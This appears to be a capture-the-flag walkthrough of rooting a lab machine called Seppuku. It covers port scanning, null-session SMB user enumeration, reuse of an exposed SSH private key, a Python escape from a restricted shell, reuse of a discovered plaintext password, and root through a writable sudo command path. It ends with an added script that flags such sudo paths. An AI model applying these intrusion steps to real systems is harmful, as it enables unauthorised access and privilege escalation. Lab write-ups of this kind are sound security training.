Samurai

Nmap

sudo nmap 192.168.104.90 -p- -sS -sV

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http          nginx 1.14.2
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
8088/tcp open  http          LiteSpeed httpd
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Starting off on this machine we find that port 80 is protected by an HTTP basic-auth login.

I decided against bruteforcing it for the moment and moved straight on to the other ports. Looking at SMB on port 445, I ran enum4linux against the target with a null session and discovered some user accounts.

enum4linux -u '' -p '' -a 192.168.104.90 

enum4linux reports the following users:

  • seppuku

  • samurai

  • tanto

With no accessible shares on SMB, we move on to enumerating port 7601, which serves a web page when opened in the browser.

Running dirsearch.py against this port reveals a /keys/ directory.

python3 dirsearch.py -u http://192.168.104.90:7601  -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60 --full-url

The directory holds two files, private and private.bak, both containing an RSA private key. I copied the key over to my attacking machine, renamed it id_rsa and used chmod to set the permissions SSH requires (SSH refuses a key that is readable by other users).

chmod 600 id_rsa

Knowing the three usernames from enum4linux, we can simply try the key against each of them over SSH. It worked for the user tanto.

ssh -i id_rsa tanto@192.168.104.90

Once logged in as tanto we find ourselves in rbash, a restricted shell that, among other things, refuses to change PATH and will not run commands given by a path containing a slash. Python is still available, so I used the following sequence: first escape rbash by having Python spawn an unrestricted /bin/sh, then set a usable PATH (the restricted shell only exposes a limited one), and finally upgrade to a proper interactive bash via a pty.

python -c 'import os; os.system("/bin/sh")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'

Once we can move around the box again, I looked in the home directory of the seppuku user. The file .passwd is of interest and contains the password: 12345685213456!@!@A

This password did not work for the user seppuku, but using su with the same password let me log in as the user samurai.

I then transferred linpeas over to the target machine, and it soon picked up an interesting sudo entry for samurai: the user may run /../../../../../../home/tanto/.cgi_bin/bin /tmp/* as root. The leading /../../ components collapse to /, so the rule really points at /home/tanto/.cgi_bin/bin, a file that does not exist but sits under a directory owned by tanto, whom we already control.

Open another tab and log in as tanto over SSH again. Then create the .cgi_bin directory and the bin file so that the path in the sudo rule exists and contains something we chose. Echo a bash invocation into the file and chmod it to make it executable.

mkdir .cgi_bin
cd .cgi_bin
echo '/bin/bash' > bin
chmod 755 bin

Then, back in the samurai tab, execute the file through sudo with exactly the path from the rule to gain a root shell:

sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
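The sudo rule above is exploitable only because its command path, once the /../../ prefix is resolved, lands under a directory the invoking chain of users can write to. The following script is an added example, not part of the original walkthrough: it resolves a sudo command path the way the kernel does and checks whether the deepest existing component (or its parent) is writable by the current user, which is exactly the condition that let tanto plant /home/tanto/.cgi_bin/bin. The sample rules at the bottom are constructed for illustration; the first one is the rule from this box.

```bash
#!/bin/bash
# Added example (not from the original writeup): given the command path from a
# sudo rule, resolve "." and ".." the way the kernel does and decide whether
# the current user could supply the binary that sudo will run as root.

# Collapse "." and ".." lexically (like realpath -m) so that a path which does
# not exist yet can still be resolved. ".." above / stays at /.
normalize_path() {
    local out="" part parts
    IFS='/' read -ra parts <<< "$1"
    for part in "${parts[@]}"; do
        case "$part" in
            ""|".") ;;
            "..")   out="${out%/*}" ;;
            *)      out="$out/$part" ;;
        esac
    done
    printf '%s\n' "${out:-/}"
}

# Walk the resolved path to the deepest component that already exists.
# If that component is writable we can overwrite it (a file) or create every
# missing directory and the target under it (a directory). If its parent
# directory is writable we can rename it out of the way and replace it.
# Prints the writable path and returns 0; returns 1 if neither is writable.
writable_prefix() {
    local target cur="" part parts cand
    target=$(normalize_path "$1")
    IFS='/' read -ra parts <<< "${target#/}"
    for part in "${parts[@]}"; do
        [ -e "$cur/$part" ] || break
        cur="$cur/$part"
    done
    cur="${cur:-/}"
    for cand in "$cur" "$(dirname "$cur")"; do
        if [ -w "$cand" ]; then
            printf '%s\n' "$cand"
            return 0
        fi
    done
    return 1
}

# Check one sudo command spec ("/path/to/cmd args ..."): only the executable
# path matters, so the arguments are stripped before the check.
# Returns 0 when the path is under our control, 1 otherwise.
check_rule() {
    local cmd="${1%% *}" resolved hit
    resolved=$(normalize_path "$cmd")
    if hit=$(writable_prefix "$cmd"); then
        printf 'EXPLOITABLE  %s\n  resolves to %s, writable: %s\n' "$1" "$resolved" "$hit"
        return 0
    fi
    printf 'ok           %s\n  resolves to %s\n' "$1" "$resolved"
    return 1
}

# Constructed sample rules: the first is the rule from this box, the second a
# normal rule that should only be reported when running as root.
main() {
    local rule
    for rule in '/../../../../../../home/tanto/.cgi_bin/bin /tmp/*' '/usr/bin/id'; do
        check_rule "$rule" || true
    done
}
[ "${BASH_SOURCE[0]}" = "$0" ] && main
```

Run it as the user that holds the sudo entry; on this box, as samurai, the first rule resolves to /home/tanto/.cgi_bin/bin and is flagged once you have write access to /home/tanto through the tanto account. The check is deliberately lexical: sudo does not canonicalise the configured path before matching, so it is the resolved target on disk that decides who controls what gets executed.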
